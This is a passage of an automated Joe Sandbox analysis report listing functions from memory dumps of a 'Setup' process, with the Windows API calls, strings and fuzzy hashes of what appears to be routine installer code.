                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID: #(loc.
                                                              • API String ID: 1663610674-1630946291
                                                              • Opcode ID: 95bf39cb08b32f6da06ee43ae991302a747deb2eeca690c793e79cdc3ffcc9c6
                                                              • Instruction ID: 34bc240620d1e3babedfa851338febb70ba82cc92e69903bb9b596348699645f
                                                              • Opcode Fuzzy Hash: 95bf39cb08b32f6da06ee43ae991302a747deb2eeca690c793e79cdc3ffcc9c6
                                                              • Instruction Fuzzy Hash: EB31A032900205AFCF04DFA8C844ADD77A5BF20368F148A56E924AFF94D770EE09CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C92D8A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: RepairOverride$UninstallOverride
                                                              • API String ID: 431132790-715699446
                                                              • Opcode ID: dc7af6623c0399947e6d9b59a5875d5af02fe7f2860c8b1c2e10de866dc7d4e6
                                                              • Instruction ID: e7a064ae021089110d85042facbcc1e6570b6707706d32be44374822ae4fed65
                                                              • Opcode Fuzzy Hash: dc7af6623c0399947e6d9b59a5875d5af02fe7f2860c8b1c2e10de866dc7d4e6
                                                              • Instruction Fuzzy Hash: C2314172600745DFDB14CFA4C8427DEB7B9BF14314F10894EA5A59BB50C730D614CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A7ACF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 6C4A7AFC
                                                                • Part of subcall function 6C4A7F08: GetLastError.KERNEL32(6C4A7B0B,?,?,?,00000000), ref: 6C4A7F08
                                                              • GetTempFileNameW.KERNEL32(?,TFR,00000000,?,?,?,?,00000000), ref: 6C4A7B54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Temp$ErrorFileLastNamePath
                                                              • String ID: TFR
                                                              • API String ID: 3373471080-3081930533
                                                              • Opcode ID: dfa37a95e924bbc7cb29138f178cf68bb50e2c41371fef45495147298ae055c2
                                                              • Instruction ID: dc0d4d315b89223d51b855b823b8db041a6a3e475f54b861b547bcf7fb971042
                                                              • Opcode Fuzzy Hash: dfa37a95e924bbc7cb29138f178cf68bb50e2c41371fef45495147298ae055c2
                                                              • Instruction Fuzzy Hash: C421FDF1A052186AEB20DB94CC44FDA77BCAB15318F5046A5F314E36C8D770DA868B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9189B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              • schema validation error: element name is wrong: , xrefs: 6C918A0C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                              • String ID: schema validation error: element name is wrong:
                                                              • API String ID: 3417717588-568579515
                                                              • Opcode ID: 4c9683826ba8f3292a1c417d19f29c7920d73cbb4755720aa1bdcf85239f3c74
                                                              • Instruction ID: 5b4ef47ee0dd170523d8e540557fb55bdef416b70d4463871a450aa01cd3232b
                                                              • Opcode Fuzzy Hash: 4c9683826ba8f3292a1c417d19f29c7920d73cbb4755720aa1bdcf85239f3c74
                                                              • Instruction Fuzzy Hash: 28319A31901149EBDB04DBE4C945BEEB7B8AF25318F24469AE011E7BC0CB30DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94EA74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94EA7B
                                                              • GetComputerObjectNameW.SECUR32(00000007,00000000,6C94FA6E), ref: 6C94EAC0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ComputerH_prolog3NameObject
                                                              • String ID: microsoft.com
                                                              • API String ID: 4212761916-499418652
                                                              • Opcode ID: 4eff78d1341faadf4134b55261300d9a2e01dff7b7dd7d4db3fd9e55023d26ee
                                                              • Instruction ID: 0dae6c0ee820d541709131402a8d49484e841211897303364bf985533547e1db
                                                              • Opcode Fuzzy Hash: 4eff78d1341faadf4134b55261300d9a2e01dff7b7dd7d4db3fd9e55023d26ee
                                                              • Instruction Fuzzy Hash: 4D218B31A112098BCF08DFB9C8545FDB762AF6232CB24866AD121E7BD0DB71D9098795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C947DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947DB7
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C914CB2: __EH_prolog3.LIBCMT ref: 6C914CB9
                                                                • Part of subcall function 6C91395E: __EH_prolog3.LIBCMT ref: 6C913965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Operation Type$Operation: %s
                                                              • API String ID: 431132790-3288381836
                                                              • Opcode ID: 998839fada09c17c24b31d619ddedbaead52b11d85372172e961db58e46ed2ed
                                                              • Instruction ID: f45633c9db35106150298b6ba972ad90dfbc51c35c002176cee5901355b7c0ed
                                                              • Opcode Fuzzy Hash: 998839fada09c17c24b31d619ddedbaead52b11d85372172e961db58e46ed2ed
                                                              • Instruction Fuzzy Hash: F5214971900109EFDB00DBE8C949ADEBBB9BF25208F14445AE144E7B81C731DA19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9236F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9236FF
                                                                • Part of subcall function 6C9238A1: __EH_prolog3.LIBCMT ref: 6C9238A8
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: CustomError$ReturnCode
                                                              • API String ID: 431132790-4065127629
                                                              • Opcode ID: 5c860a796736609b4143983c0ada59517d18c82373d60314e692c2e7276a8802
                                                              • Instruction ID: d1d56b08acf3fa27bd42a3d624bae07bb0c3948f509b0b92034337b3a016234c
                                                              • Opcode Fuzzy Hash: 5c860a796736609b4143983c0ada59517d18c82373d60314e692c2e7276a8802
                                                              • Instruction Fuzzy Hash: B421B771A1020A9FCF04CFB4C950AADB7B9BF65308F108519F450EBB80CB30E909CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94FF21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcsnlen.LIBCMT ref: 6C94FF54
                                                              • _memcpy_s.LIBCMT ref: 6C94FF8A
                                                                • Part of subcall function 6C968E8C: __CxxThrowException@8.LIBCMT ref: 6C968EA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                              • String ID: OS Version Information
                                                              • API String ID: 31407445-551053750
                                                              • Opcode ID: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                              • Instruction ID: e05fafaad7c772f05545238cae894cf0f956f849730d0651969dfc83bcb39a21
                                                              • Opcode Fuzzy Hash: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                              • Instruction Fuzzy Hash: 0101D632600108BF9B14DF69CC48C9D77E9EBA5368711C56EF518DBA90EA30EA15CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48F0C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48F0CF
                                                                • Part of subcall function 6C49F21D: _wcsnlen.LIBCMT ref: 6C49F1B2
                                                              • DeleteFileW.KERNEL32(00000000,00000010,HFI,00000000,00000000,6C4879E4,00000004,6C4A57E2,?,?,?,?,?,?,00000024,6C48F18B), ref: 6C48F14B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                              • String ID: HFI
                                                              • API String ID: 1332513528-686494941
                                                              • Opcode ID: 7ce449854db90fa785f2980bf19bed093cf8285cd7e8c643350a42a58f5d0784
                                                              • Instruction ID: 86634362c405ec100ddb49a13c92d2774ef35186b7fe4f3b38fd8189dfcd9425
                                                              • Opcode Fuzzy Hash: 7ce449854db90fa785f2980bf19bed093cf8285cd7e8c643350a42a58f5d0784
                                                              • Instruction Fuzzy Hash: 1C1151317021849FD700DFB8C845E9EB7A4EF2531CB04425EE461ABB99DB70DD0A8AE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C93531E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C935325
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                              • DeleteFileW.KERNEL32(?,00000010,HFI,00000000,?,6C90AB18,00000004,6C95A448,512AC3CC,512AC3CC,?,?,6C944B23), ref: 6C935399
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                              • String ID: HFI
                                                              • API String ID: 1332513528-686494941
                                                              • Opcode ID: a28d388e1fa0bf46576d3e8a5437334089b0a06fff69bc6a50bab46928903581
                                                              • Instruction ID: 48ba028bdd0b578416eed59d3b0804a8dfa3f3fcc595a12553d72eeba0e2e19e
                                                              • Opcode Fuzzy Hash: a28d388e1fa0bf46576d3e8a5437334089b0a06fff69bc6a50bab46928903581
                                                              • Instruction Fuzzy Hash: F611E131300118DFEB189F79C844AAEB7A4AF7A35CB10462AE4219BFD0DB70D91887A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95356C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953573
                                                                • Part of subcall function 6C91579B: _memset.LIBCMT ref: 6C9157CA
                                                                • Part of subcall function 6C91579B: GetVersionExW.KERNEL32 ref: 6C9157DF
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 6C9157F5
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 6C9157FD
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000001,?,00000001,00000001), ref: 6C915805
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000001,?,00000020,00000001,?,00000001,00000001), ref: 6C91580D
                                                                • Part of subcall function 6C91579B: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C915818
                                                              Strings
                                                              • SYSTEM\CurrentControlSet\Control\Windows, xrefs: 6C9535E1
                                                              • CSDReleaseType, xrefs: 6C9535CC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ConditionMask$Version$H_prolog3InfoVerify_memset
                                                              • String ID: CSDReleaseType$SYSTEM\CurrentControlSet\Control\Windows
                                                              • API String ID: 3830908078-406884543
                                                              • Opcode ID: 53e75112b470d2b8d66fb64ad579ff16bcf8fb0a1d548f1a1ddcb79dcc91627d
                                                              • Instruction ID: 72fe03bc50634783539922c876997286e8279177418b9fc1c80a50c6e94cab16
                                                              • Opcode Fuzzy Hash: 53e75112b470d2b8d66fb64ad579ff16bcf8fb0a1d548f1a1ddcb79dcc91627d
                                                              • Instruction Fuzzy Hash: 6A0169B2D1112867DB148F18C8126E83794BB30758F064166FD59EBB81D235DA14CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C951602 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,6C94FA6E,?,?,?,?,?,?,6C9534F1,6C94FA6E,000000FF), ref: 6C951637
                                                              • GetLastError.KERNEL32(?,6C94FA6E,?,?,?,?,?,?,6C9534F1,6C94FA6E,000000FF,?,?,00000738,6C94FA6E,?), ref: 6C951647
                                                                • Part of subcall function 6C917479: __EH_prolog3.LIBCMT ref: 6C917480
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DiskErrorFreeH_prolog3LastSpace
                                                              • String ID: GetDiskFreeSpaceEx
                                                              • API String ID: 3776785849-3355056173
                                                              • Opcode ID: 74abf32392242be0f3582f8ad1cdc760bc6477610363e6490daa76fd3d25f24b
                                                              • Instruction ID: 3a45d26ad5c9c103735c03acb72511059e5b6a301eb6b6fb865554da016f488d
                                                              • Opcode Fuzzy Hash: 74abf32392242be0f3582f8ad1cdc760bc6477610363e6490daa76fd3d25f24b
                                                              • Instruction Fuzzy Hash: A70128BAA00219FB8B00DF99D8458EEBBB9EBA9710F114459F915B3240D770AB49CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94EC5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94EC61
                                                                • Part of subcall function 6C943B2B: __EH_prolog3.LIBCMT ref: 6C943B32
                                                                • Part of subcall function 6C943B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C94EC79,?,?), ref: 6C943BC9
                                                                • Part of subcall function 6C952C16: PathFileExistsW.SHLWAPI(00000000), ref: 6C952CA8
                                                                • Part of subcall function 6C952C16: __CxxThrowException@8.LIBCMT ref: 6C952CE7
                                                                • Part of subcall function 6C952C16: CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C952D19
                                                                • Part of subcall function 6C952C16: SetFileAttributesW.KERNEL32(?,00000080), ref: 6C952D32
                                                              • InitializeCriticalSection.KERNEL32(?,?,?,.html,00000001,00000000,6C94747C,00000000,00000000,?,?,?,?,?,?,?), ref: 6C94ECBB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$CriticalH_prolog3InitializeSection$AttributesCopyException@8ExistsPathThrow
                                                              • String ID: .html
                                                              • API String ID: 4277916732-2179875201
                                                              • Opcode ID: 1c6721dd2b8b123b05dc0c7bc19e38640792ccc407ebcd12f1e1882bcfa1fabc
                                                              • Instruction ID: 14cf1ca0b58383d83d332715d10eb1b657683efd6da43243cf95513bb2f3b3e2
                                                              • Opcode Fuzzy Hash: 1c6721dd2b8b123b05dc0c7bc19e38640792ccc407ebcd12f1e1882bcfa1fabc
                                                              • Instruction Fuzzy Hash: 92F0CD31600241EBEB06EBA5C5487DCB7A57F3530CF4040199504ABF80CB75EA2CD7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C496615 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6C496636
                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,6C4972CF), ref: 6C496648
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$Create
                                                              • String ID: tooltips_class32
                                                              • API String ID: 870168347-1918224756
                                                              • Opcode ID: 0d9f131fb317274f27ef4f247db7544436cf34fb229e6638b2d18ff406451462
                                                              • Instruction ID: dbaa7cf24cfd9740f40522834a9ffad50d32c9fafb46c72d2bd528648bcec9fd
                                                              • Opcode Fuzzy Hash: 0d9f131fb317274f27ef4f247db7544436cf34fb229e6638b2d18ff406451462
                                                              • Instruction Fuzzy Hash: A8E04CB15471317EE6709A5AAC1CFE76E6CEF476B0F214219792CE2580D6209910C7F0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95A1E6 Relevance: 4.7, APIs: 3, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95A1ED
                                                              • GetCurrentProcessId.KERNEL32(00000020,6C9353D9,00000000,?,?,6C944B23), ref: 6C95A1FD
                                                                • Part of subcall function 6C935238: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C935254
                                                                • Part of subcall function 6C935238: _memset.LIBCMT ref: 6C93526E
                                                                • Part of subcall function 6C935238: Process32FirstW.KERNEL32(00000000,?), ref: 6C935288
                                                                • Part of subcall function 6C935238: FindCloseChangeNotification.KERNEL32(00000000), ref: 6C9352B7
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
